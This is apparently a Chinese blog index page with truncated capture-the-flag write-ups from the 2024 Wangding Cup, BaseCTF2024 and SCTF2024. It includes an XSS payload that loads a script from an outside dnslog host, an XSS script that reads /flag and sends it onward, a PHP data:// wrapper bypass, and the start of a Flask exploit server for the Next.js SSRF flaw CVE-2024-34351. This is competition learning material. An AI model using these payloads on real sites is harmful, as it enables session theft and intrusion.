2024网鼎杯-青龙组-WP
最终排名:309
Web签到网鼎杯公众号得到flagWEB02首先是登录系统任意账号密码登录
然后测试存在xss漏洞
dnslog测试也成功,payload:**<script src=http://dnslog的ip></script>**
第三步使用xss脚本将/flag路由的响应回显到当前界面(/flag路由打开f12可以看到)<script>(function() { var opium = new XMLHttpRequest(); opium.open('GET', '/flag', true); opium.onload = function() { if (opium.status === 200) { var flagData = opium.responseText; sendFlag(flagData); } }; o ...
方兴未艾第35期|Google Hacking教育漏洞实战
发布在广州大学方班预备班公众号-栏目’方兴未艾’链接:https://mp.weixin.qq.com/s/vrjFQclFgDmZWmEyDu5OCw
BaseCTF2024 Web WP
Web[week1] A Dark Room考点:f12源代码查看做题步骤 :第一题我就想到了很简单,所以直接找源码看看,直接点击enable audio然后点击生活查看源代码得到flag
[Week1] Aura 酱的礼物考点:f12源代码查看
做题步骤 :首先看到file_get_contents($pen)!=='Aura'我就立马想到data伪协议来绕过,所以构造pen=data://text/plain,Aura然后接下来看到$challenge=$_POST['challenge'];if strpos($challenge,'http://jasmineaura.github.io')!==0){die('这不是Aura的博客!');}$blog_content=file_get_contents($challenge);if(strpos($blog_content,'已经收到Kengwang的礼物啦')===false){die('请去博客里面写下感想 ...
SCTF2024 Web&Misc 复现
Webezjump参考链接:
【网络安全】「漏洞复现」(五)从 NextJS SSRF 漏洞看 Host 头滥用所带来的危害
Redis主从复制实现RCE
CVE-2024-34351 漏洞复现
首先跑去搜索文章,找到【网络安全】「漏洞复现」(五)从 NextJS SSRF 漏洞看 Host 头滥用所带来的危害发现和我抓包back to home界面极其相似从而得知是NextJS SSRF 漏洞,也就是CVE-2024-34351,由Next.js异步函数createRedirectRenderResult导致的SSRF。
同时docker-compose.yml给出了内网ip
题目源码中的重定向代码:
SSRF验证:
脚本:exp.py
from flask import Flask, request, Response, redirectapp = Flask(__name__)@app.route('/play')def exploit(): # CORS preflight check if request.method == ' ...




